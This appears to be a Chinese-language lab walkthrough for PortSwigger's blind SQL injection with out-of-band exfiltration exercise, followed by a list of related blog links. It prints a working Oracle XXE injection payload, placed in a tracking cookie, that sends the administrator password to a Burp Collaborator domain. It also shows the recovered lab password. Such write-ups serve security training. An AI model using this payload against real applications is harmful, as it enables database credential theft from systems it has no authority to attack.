Lab17_ Blind SQL injection with out-of-band data exfiltration

文章目录

前言:

实验室标题为:

带外数据泄露的 SQL 盲注

简介:

本实验包含一个SQL盲目注入漏洞。应用程序使用跟踪Cookie进行分析,并执行包含提交的Cookie值的SQL查询。

SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以触发与外部域的带外交互。

该数据库包含一个名为users的表,其中的列名为username和password。您需要利用SQL盲目注入漏洞来找出管理员用户的密码。

要解决实验,请以管理员用户身份登录。

注意

为了防止Academy平台被用于攻击第三方,我们的防火墙阻止了实验室与任意外部系统之间的交互。要解决实验,您必须使用Burp Collaborator的默认公共服务器。

提示

您可以在 SQL 注入小抄中找到一些有用的有效载荷

进入实验室

依然是商店页面

构造 payload

点击任意分类,打开 burp 进行抓包

复制 Collaborator 中的链接

sql 复制代码
TrackingId=x' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.c5inwpad5ruzenww7a6z0gt3dujm7cv1.oastify.com/"> %remote;]>'),'/l') FROM dual--

发送数据包,成功响应

转到 Collaborator 模块,点击 Poll now

可以看到管理员账户的密码被成功外带出来

登录管理员账号

administrator

q1uuvho3ov5renjtp936

成功登录管理员账户

相关推荐
admin and root2 分钟前
从资产收集FUZZ接口到SQL注入案例
网络·数据库·sql·安全·web安全·渗透测试·log4j
小陈工13 分钟前
Python Web开发入门(十):数据库迁移与版本管理——让数据库变更可控可回滚
前端·数据库·人工智能·python·sql·云原生·架构
Xudde.2 小时前
班级作业笔记报告0x06
笔记·学习·安全·web安全
NaclarbCSDN3 小时前
User ID controlled by request parameter with password disclosure-Burp 复现
网络·安全·web安全
xcLeigh4 小时前
IoTDB AINode 实战指南:SQL 原生时序 AI 建模,毫秒级预测 / 异常检测落地
人工智能·sql·ai·iotdb·ainode
admin and root4 小时前
XSS之Flash弹窗钓鱼
前端·网络·安全·web安全·渗透测试·xss·src
瘾大侠5 小时前
HTB - DevArea
安全·web安全·网络安全
乐之者v5 小时前
统计数据时,sql执行超时,如何处理
服务器·数据库·sql
电商API&Tina5 小时前
【京东item_getAPI 】高稳定:API 、非爬虫、不封号、不掉线、大促稳跑
大数据·网络·人工智能·爬虫·python·sql·json
xxjj998a5 小时前
sql实战解析-sum()over(partition by xx order by xx)
数据库·sql